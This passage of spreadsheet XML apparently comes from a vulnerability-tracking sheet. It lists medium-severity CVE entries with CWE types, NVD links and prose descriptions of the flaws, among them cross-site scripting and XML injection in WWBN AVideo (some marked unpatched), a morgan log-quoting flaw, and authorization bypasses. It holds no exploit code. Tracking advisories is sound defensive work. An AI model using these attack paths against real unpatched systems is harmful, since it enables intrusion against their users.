          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86781</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86809</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr"/>
      <c r="Q823" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>The Persian Elementor WordPress plugin from 2.7.10 before 2.8.2 does not verify that the payment authority returned to its ZarinPal payment callback belongs to the transaction being completed, allowing unauthenticated attackers to complete a pending order using a valid payment authority obtained from a different transaction.</t>
        </is>
      </c>
      <c r="S823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86809</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr"/>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr"/>
      <c r="Q824" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>morgan is an HTTP request logger middleware for Node.js. In versions before 1.12.1, its escapeLogField() function does not escape the double quote character, which delimits the quoted fields of the Apache combined log format that morgan emits. An unauthenticated remote attacker who controls a value written to a quoted field, such as the User-Agent or Referer header, can include a double quote to close that field early, so a log consumer that parses the log by field position reads attacker-supplied text as the following field. In the built-in formats this makes the recorded value differ from the value that was sent, and in custom formats that quote an attacker-controlled token before a server-controlled one it can forge values such as the response status. No newline is injected, so record separation stays intact. The issue is fixed in morgan 1.12.1, which escapes the double quote. Users should upgrade to morgan 1.12.1 or later.</t>
        </is>
      </c>
      <c r="S824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89179</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr"/>
      <c r="Q825" s="5" t="inlineStr">
        <is>
          <t>CWE-353</t>
        </is>
      </c>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Missing Support for Integrity Check vulnerability. Unauthenticated attackers on the same network can intercept a student's connection packet and replay it, thereby forging the appearance that the student remains connected.</t>
        </is>
      </c>
      <c r="S825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89179</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89239</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr"/>
      <c r="Q826" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in the showAlertMessage() function that inserts the raw Referer header into a JavaScript comment without encoding. Attackers can craft a Referer header containing */ to close the comment and inject arbitrary JavaScript that executes in the site origin for visitors arriving from the attacker-controlled page.</t>
        </is>
      </c>
      <c r="S826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89239</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89240</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr"/>
      <c r="Q827" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in plugin/Live/confirmLivePassword.php. The script interpolates the unauthenticated GET parameter u (which is not covered by $securityFilter) directly into an &lt;img src="..."&gt; attribute without URL- or HTML-encoding. A remote attacker can craft a link containing a double-quote character in u (with a non-empty key parameter and no valid c parameter) to close the src attribute and inject an additional tag with an onerror handler, executing arbitrary JavaScript in the site's origin in the browser of any user, including an administrator, who opens the link. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="S827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89240</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89241</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr"/>
      <c r="Q828" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in confirmLivePassword.php that copies REQUEST_URI into a form action attribute without encoding. Attackers can craft a malicious URL with a quote character to break out of the action attribute and inject event handlers that execute in the victim's browser within the site origin.</t>
        </is>
      </c>
      <c r="S828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89241</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89244</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr"/>
      <c r="Q829" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in plugin/Gallery/view/Category.php when SubCategorys is enabled. The getBackURL parameter is echoed into an href attribute without HTML encoding, allowing attackers to inject malicious scripts that execute in visitors' browsers when they interact with the Back control.</t>
        </is>
      </c>
      <c r="S829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89244</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89247</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr"/>
      <c r="Q830" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo at commit c3edcc274c389816d434acadac07ee78eaf330c1 and earlier contains an XML injection vulnerability in plugin/AD_Server/VMAP.php, which is reachable without authentication when the AD_Server plugin is enabled. The script emits Content-Type: application/xml and writes the timeOffset and idTag values returned by AD_Server::getVMAPSFromRequest() directly into VMAP attributes without encoding. Those values originate from the base64- and JSON-decoded $_REQUEST['vmaps'] parameter, which is not covered by $securityFilter in objects/security.php. A remote attacker can craft a vmaps value (containing a non-empty VAST.campaing entry) and induce a user to open the resulting VMAP URL or a video page using it, injecting arbitrary &lt;vmap:AdBreak&gt; and &lt;vmap:AdTagURI&gt;/AdSource nodes into the generated XML. The player's IMA path (afterVideoJS -&gt; PlayerSkins::setIMAADTag) then requests the attacker-supplied ad URLs, resulting in ad injection and cross-origin requests from the victim's playback session. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="S830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89247</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89257</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr"/>
      <c r="Q831" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an insecure direct object reference (IDOR) vulnerability in objects/categoryDeleteAssets.json.php. The endpoint validates only the Category::canCreateCategory() capability and a CSRF nonce before passing the attacker-supplied $_REQUEST['id'] to Category::deleteAssets(), which recursively removes {systemRootPath}videos/categories/assets/{id}/. It omits the Category::userCanEditCategory() ownership check enforced by the sibling Category::delete(). On installations where the non-default usersCanCreateNewCategories setting is enabled, an authenticated non-admin user with the canUpload capability can send a POST request with an arbitrary category ID and recursively delete any category's on-disk asset directory (icons/images). Category records and videos are not deleted. As of the advisory publication no patched version was available.</t>
        </is>
      </c>
      <c r="S831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89257</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89264</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr"/>
      <c r="Q832" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 fails to validate the comment author identity in the POST /web/comment/add endpoint, allowing authenticated users to post comments attributed to any other user. Attackers can supply arbitrary userUid values in the request body to impersonate other accounts including administrators.</t>
        </is>
      </c>
      <c r="S832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89264</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89265</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr"/>
      <c r="Q833" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>MoguBlog through 6.2 contains an authorization bypass vulnerability in the POST /pictureSort/getPictureSortByUid endpoint, which omits the @AuthorityVerify annotation required to enforce role-based permissions. Authenticated back-office users without image-category permissions can supply a category uid to retrieve restricted image-category records including metadata such as name, cover file uid, sort order and timestamps.</t>
        </is>
      </c>
      <c r="S833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89265</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90443</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr"/>
      <c r="Q834" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>A web interface reflects a portion of the request URL into a script context and a hyperlink attribute without adequate encoding, and does not require authentication to reach. This allows an unauthenticated network attacker to craft a link that, when visited by a user, executes arbitrary script in the context of the affected application and can redirect the user's browser to an arbitrary external site. Successful exploitation could allow an attacker to act with the compromised user's session privileges within the application.</t>
        </is>
      </c>
      <c r="S834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90443</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90446</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr"/>
      <c r="Q835" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>An application programming interface endpoint accepts a user-supplied value and interpolates it directly into the path of a backend request to the underlying search and analytics data store, without restricting its contents. This allows an authenticated attacker to substitute an arbitrary backend path, causing the application's own elevated service credentials to be used against unintended internal endpoints. This could allow an attacker to enumerate or read internal configuration and administrative data from the backend data store that would otherwise be restricted.</t>
        </is>
      </c>
      <c r="S835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90446</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90450</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr"/>
      <c r="Q836" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>The application's role-authorization lookup defaults to granting access when a request handler's name is not present in its table of role requirements, rather than defaulting to deny. Any request handler that is not explicitly registered in this table is reachable by any authenticated user regardless of their assigned role, and any newly added handler is fail-open by default until explicitly added to the table.</t>
        </is>
      </c>
      <c r="S836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90450</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90454</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr"/>
      <c r="Q837" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>A deployment mode intended to expose only read access to a bundled packet-analysis component's interface denies a list of write-capable routes by pattern, but the pattern omits routes that modify tags attached to stored session records, and the proxy configuration otherwise permits the request method those routes use. This allows an authenticated user on a deployment intended to be read-only to add or remove tags on stored session records.</t>
        </is>
      </c>
      <c r="S837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90454</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>GHSA-vfm7-4h43-gp6m</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M838" s="5" t="inlineStr">
        <is>
          <t>0.9.0</t>
        </is>
      </c>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr"/>
      <c r="P838" s="5" t="inlineStr"/>
      <c r="Q838" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j828-28rj-hfhp. This link is maintained to preserve external references.
### Original Description
